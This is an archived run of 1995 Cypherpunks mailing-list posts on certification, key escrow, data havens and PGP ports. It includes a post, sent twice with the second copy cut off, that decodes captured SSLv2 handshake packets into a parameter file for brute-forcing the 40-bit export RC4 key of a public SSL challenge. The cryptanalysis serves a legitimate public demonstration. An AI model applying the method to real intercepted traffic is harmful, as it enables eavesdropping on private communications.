In-Reply-To: <Pine.3.89.9508191641.A620955565-0100000@umiami.ir.miami.edu>
Message-ID: <199508210400.OAA03317@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello Michael Froomkin <mfroomki@umiami.ir.miami.edu>
  and Rich Salz <rsalz@osf.org>
  and cypherpunks@toad.com

Original reason at end (after the reply).

> But this is precisely the issue: what does the *certificate* get any of 
> these people that a simple digital signature does not provide?

Protection from spoofing.

> On Sat, 19 Aug 1995, Rich Salz wrote:
> 
> > I think there are many people who might be willing to use an
> > "anon CA" should it exist:
> > 	Whistleblowers, perhaps Deep Throat would have used email

Certification is needed to avoid another person intercepting, re-signing,
and substituting hir own key.

> > 	Any number of writers who have used psuedonyms and now want to
> > 		get paid in ecash; Mark Twain?

Certification is needed to avoid another person diverting the ecash
(a disputed unsigned key practically useless). In fact a much simpler
attack is denial-of-service: simply dispute the key (send another one
to the keyservers), and let the resulting uncertainty cut off the profits.


Also, if you insist on govt-is-root, you need certified pseudonyms
to set up a pseudonymous CA (ie a CA whose real identity is unknown).


Hope that makes sense...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Mon, 21 Aug 95 12:10:15 PDT
To: cypherpunks@toad.com
Subject: Re: Newton 2
Message-ID: <v02130500ac5e436d94d4@[199.1.11.207]>
MIME-Version: 1.0
Content-Type: text/plain


<<crossed to cypherpunks>>

>At 8:56 AM 8/21/95, Robert Patoine wrote:
>
>>Metroworks do Have a C Compiler for the Newton Hardware develloped for
>>Sony-Magic Cap OS
>
>Magic Cap works on Magic Cap PDAs.  The newton is not one of them.
>Motorola uses magic cap for their PDAs, and I think AT&T does as well, but
>that's an uncertainty.
>

Considering that AT&T markets PersonaLink as an e-mail service for
MagicCap users i suspect they do support MagicCap in at least one of
their PDAs.  PersonaLink is, i believe, related to Telescript, which is
the scripting language for MagicCap (OK, it's a bit more than a scripting
language, but i'm not that into it).

I've heard a few times that not having a C compiler prevents the implementation
of PGP.  Why?  Do the RSA people refuse to license a non-C implementation.
If so, can they still enforce their patent against someone who implemented
it on a
platform that didn't have a C compiler?

But then i hear that the Newton will have some support for C development
sometime
this year.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 21 Aug 95 11:23:56 PDT
To: vince@offshore.com.ai>
Subject: Whither Barbados?
Message-ID: <v02120d03ac5e6a1ca0e6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I've cc'd (former cypherpunk) Vince Cate on Anguilla on this for obvious
reasons.

I got a bit of blurbuge in the USnail from the Barbados Investment and
Development Corporation (BIDC) on their 3rd Barbados Information Services
Converence, (Subtitled "Surfing the Global Net from Caribbean Shores" ;-),
February 26/27 1996.

The headers in the blurb were: Investment Management in Emerging Markets --
Information Technology Challenges, Network Security on the Global Net, New
Opportunities in Wireless Communications, Barbados -- the Carribbean hub
for Internet Access.

They promise a "Full Conference Programme available October 1, 1995", and
they seem to have a mailbot at info_bisc@caribnet.net.

Having inadvertantly <ahem> plugged their stuff with no idea whether it's a
waste of time or not, I have a few thoughts about this and about
data/banking havens in general.

First, here's what I know about internet access in the Caribbean, gleaned
from discussions with Vince, and by lurking on various caribbean newsgroups
(see soc.culture.caribbean), web pages, and mail groups:

First off, bandwidth down there sucks. This is probably because there
really aren't many people there, the ones that are there are pretty poor,
and they can't buy much phone time.  This is compounded by monopolies,
Cable and Wireless being the biggest, built on cozy relationships with
government officials, if not actual creatures of those government officials
themselves, amortizing their <exageration mode on> 30 year old centrex
switches with 50 year schedules <e.m. off>. To be fair, they have to have
long distance lines to the mainland, and those cost, whether they're
copper, fiber, or satellite.

All the shenanigans of third world politics apply there. Trinidad and
Tabago had an attempted coup recently, Barbados, I believe, is in the
throes of a constitutional crisis where the speaker of their legislature
can't be impeached because she won't conviene the committee to impeach
her...

Not to mention hurricanes, and in Montserrat, a volcano going off at the
moment...

The obvious reason I'm interested in this is regulatory arbitrage, of
course.  If there's a government that will let internet commerce and
privacy flourish there, then it flourishes everywhere on the net, national
borders or no.

I hear tell that Barbados is serious about converting its information
technology business from data entry and forms processing to
web-cluefullness. Given that their business development people don't have
their own domain name, they probably have a bit to go.

So, I have a little exercise...

If we were to tell the government of Barbados what it had to do to promote
the creation of internet commerce, what would we say?  Anyone here could
probably crank out a prima facie set of reccommendations, but I figure to
beat this to death canonically and have a little fun at the same time.

So, here a few categories to get started.  I'm trying to keep it relevant
to this group's charter.

Infrastructure
 Power
 Long distance
 Local wire
 Local wireless
Regulatory
 Financial Privacy Laws
 Telecommunications Competition
 Civil/Human Rights
   Privacy
   Business Deregulation
   Government intervention in the economy
Culture
 Religeous/Cultural tolerance (the Netherlands are tolerant, for instance)
 Education (talent pool)

Well, that's a place to start.  I'll try to plug in my 2 cents in another
posting...

Cheers,
Bob Hettinga






-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Mon, 21 Aug 95 11:23:53 PDT
To: cypherpunks@toad.com
Subject: Partial Key Escrow
Message-ID: <ckCAut70BwwM80o3IB@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent discussion of the SSL Challenge and the revival of the
Software Key Escrow issue brought the following idea to mind.  For the
purposes of this suggestion let's just assume that the goal is to
provide some kind of Government Access to Keys (GAK) for a widely
deployed crypto system such as clipper phones. 

How about if instead of escrowing the whole key with the
goverment/escrow agent you only save some of the bits of the key?  I am
thinking that the goverment would insist that at a minimum all key bits
in excess of some N be escrowed.  Where N is aournd 48.  So if I was
using IDEA with 128-bit keys, I'd need to escrow at least 80 bits and
reveal all 128 bits only to the receiver.  The export version of RC4 is
similar except that 40 bits are hidden and 88 bits are "escrowed" as
plaintext. 

I see the advantage of this is that it might just be palatable to the
government.  In particular, 48 bits wouldn't be any significant burden
on the NSA or FBI for legally authorized wiretaps (I recall that
something like 1000 were performed in some recent year).  It would be a
simple matter for the FBI to budget enough hardware to do brute force
attacks on a few thousand keys a year with a time-to-crack of a few
hours (I doubt most wiretaps are obtained with more time urgency than
this). 

The big advantage to the user is that this provides are well defined
limit on the effort required to violate their privacy.  The biggest
problem with the clipper-type GAK system is that everyone assumes that
in the worst case keys could be obtained illegally with essentially zero
cost.  There are numerous scenarios where the administrative controls
that protect keys break down and the public is left with no privacy at
all.  In this case, however, there is a significant, well-known, and
quantitative (but, unfortunately, time-variable) cost in obtaining a key
even if the adminstrative controls are completely compromised. 

While this doesn't make the privacy of any particular target much safer
it seems it would significantly improve the safety of the public privacy
in aggregate. 

Ted Anderson 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@exe.ex.ac.uk
Date: Mon, 21 Aug 95 06:56:54 PDT
Subject: NEXT CHALLENGE...
Message-ID: <9508211354.AA12454@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Please note mail to me may bounce unless you are very careful with using
addr aba@exe.ex.ac.uk, or aba@atlas.ex.ac.uk, as there are machines out here
due to a physical breakin - a "RAM raid", I tried posting this on Sat, but
the mailer was already out and mail is buffered, so may come out twice]

A break down of Hal's challenge, could someone please check my logic
in deriving an Andrew Roo's style config file for brutessl 1.0 and
check my interpretation against Hal's interpretation in the previous
challenge.

Hal's previous challenge is indexed from his home page:
	
	http://www.portal.com/~hfinney/

I think the challenge file should look like this:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Below I will give my resoning for each field.  Each field as it is
derived will be quoted with >>>

Could a few people check that I have made no mistakes.

Andrew Roos code is on:

	http://www.brute.cl.cam.ac.uk/brute/

as "brutessl.tar.gz", use "save next link as" in netscape (hold shift
key down and click in Netscape 1.1).

Could someone with a PC, and a 32 bit MS Visual C++ compiler handy
compile a PC executable from the tarred files, some people won't have
access to TAR under DOS, and a precompiled binary would be useful.
Please send the binary to Piete if you do this (be sure to turn on all
optimisations).  I tried but my VC++ is not 32 bit, is it possible to
produce 32 bit binaries which can be run from DOS with VC++ at all?  Are the
binaries you get with win 95 / win NT likely to run under DOS ?

The keyserver will not be doling yet but please pickup the software
ready to start.

There is a unix based client, and a windows NT based client both
available from that page.



----------------------------------------------------------------------

First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 


0x80 0x1c       Length field: 28 bytes follow in the packet.
0x01            MSG_CLIENT_HELLO
0x00 0x02       CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00       SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10       CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80  CIPHER-SPECS-DATA
                SESSION-ID-DATA
0x07 .. 0xc6	CHALLENGE-DATA [16 bytes]

CHALLENGE is:


>>> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6


first message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

This is interpreted as follows:

0x82 0x14       Packet length, 532 bytes follow.
0x04            MSG-SERVER-HELLO
0x00            SESSION-ID-HIT
0x01            CERTIFICATE-TYPE
0x00 0x02       SERVER-VERSION-MSB SERVER-VERSION-LSB
0x01 0xf6       CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10       CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0x8a     CERTIFICATE-DATA [502 bytes]
0x02 0x00 0x80  CIPHER-SPECS-DATA
0xd5...0xa4     CONNECTION-ID-DATA [16 bytes]

CONNECTION-ID is:

>>> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

This is interpreted as follows:

0x80 0x55       Packet length, 85 bytes follow.
0x02            MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80  CIPHER-KIND
0x00 0x0b       CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40       ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00       KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0xfb...0x36     CLEAR-KEY-DATA [11 bytes]
0x5a...0x2a     ENCRYPTED-KEY-DATA [64 bytes]
                KEY-ARG-DATA

So CLEAR-MASTER is:

>>> CLEAR-MASTER     fbc009916010a6153f8f36


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

This is interpreted as follows:

0x80 0x21       Packet length, 33 bytes follow
0x9a...0x82     RC4 encrypted MAC [16 bytes]
0x00            RC4 encrypted MSG-SERVER-VERIFY (0x05)
0x65...0x1b     RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
                [16 bytes]


Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0x07 0xea 0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f
0xc6 

Ciphertext (from SERVER-VERIFY packet):

0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2 0x33 0xb2
0x1b

SERVER-VERIFY is the encrypted MSG-SERVER-VERIFY plus the first seven
bytes of the encrypted CHALLENGE-DATA:

>>> SERVER-VERIFY      006599b6d2f2a736



So the completed challenge file is:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@exe.ex.ac.uk
Date: Mon, 21 Aug 95 14:29:39 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: NEXT CHALLENGE...
Message-ID: <199508211958.MAA16793@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


[Please note mail to me may bounce unless you are very careful with using
addr aba@exe.ex.ac.uk, or aba@atlas.ex.ac.uk, as there are machines out here
due to a physical breakin - a "RAM raid", I tried posting this on Sat, but
the mailer was already out and mail is buffered, so may come out twice]

A break down of Hal's challenge, could someone please check my logic
in deriving an Andrew Roo's style config file for brutessl 1.0 and
check my interpretation against Hal's interpretation in the previous
challenge.

Hal's previous challenge is indexed from his home page:
	
	http://www.portal.com/~hfinney/

I think the challenge file should look like this:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Below I will give my resoning for each field.  Each field as it is
derived will be quoted with >>>

Could a few people check that I have made no mistakes.

Andrew Roos code is on:

	http://www.brute.cl.cam.ac.uk/brute/

as "brutessl.tar.gz", use "save next link as" in netscape (hold shift
key down and click in Netscape 1.1).

Could someone with a PC, and a 32 bit MS Visual C++ compiler handy
compile a PC executable from the tarred files, some people won't have
access to TAR under DOS, and a precompiled binary would be useful.
Please send the binary to Piete if you do this (be sure to turn on all
optimisations).  I tried but my VC++ is not 32 bit, is it possible to
produce 32 bit binaries which can be run from DOS with VC++ at all?  Are the
binaries you get with win 95 / win NT likely to run under DOS ?

The keyserver will not be doling yet but please pickup the software
ready to start.

There is a unix based client, and a windows NT based client both
available from that page.



----------------------------------------------------------------------

First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 


0x80 0x1c       Length field: 28 bytes follow in the packet.
0x01            MSG_CLIENT_HELLO
0x00 0x02       CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00       SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10       CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80  CIPHER-SPECS-DATA
                SESSION-ID-DATA
0x07 .. 0xc6	CHALLENGE-DATA [16 bytes]

CHALLENGE is:


>>> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6


first message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

This is interpreted as follows:

0x82 0x14       Packet length, 532 bytes follow.
0x04            MSG-SERVER-HELLO
0x00            SESSION-ID-HIT
0x01            CERTIFICATE-TYPE
0x00 0x02       SERVER-VERSION-MSB SERVER-VERSION-LSB
0x01 0xf6       CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10       CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0x8a     CERTIFICATE-DATA [502 bytes]
0x02 0x00 0x80  CIPHER-SPECS-DATA
0xd5...0xa4     CONNECTION-ID-DATA [16 bytes]

CONNECTION-ID is:

>>> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

This is interpreted as follows:

0x80 0x55       Packet length, 85 bytes follow.
0x02            MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80  CIPHER-KIND
0x00 0x0b       CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40       ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00       KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0xfb...0x36     CLEAR-KEY-DATA [11 bytes]
0x5a...0x2a     ENCRYPTED-KEY-DATA [64 bytes]
                KEY-ARG-DATA

So CLEAR-MASTER is:

>>> CLEAR-MASTER     fbc009916010a6153f8f36


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

This is interpreted as follows:

0x80 0x21       Packet length, 33 bytes follow
0x9a...0x82     RC4 encrypted MAC [16 bytes]
0x00            RC4 encrypted MSG-SERVER-VERIFY (0x05)
0x65...0x1b     RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
                [16 bytes]


Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0x07 0xea 0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f
0xc6 

Ciphertext (from SERVER-VERIFY packet):

0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2 0x33 0xb2
0x1b

SERVER-VERIFY is the encrypted MSG-SERVER-VERIFY plus the first seven
bytes of the encrypted CHALLENGE-DATA:

>>> SERVER-VERIFY      006599b6d2f2a736



So the completed challenge file is:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
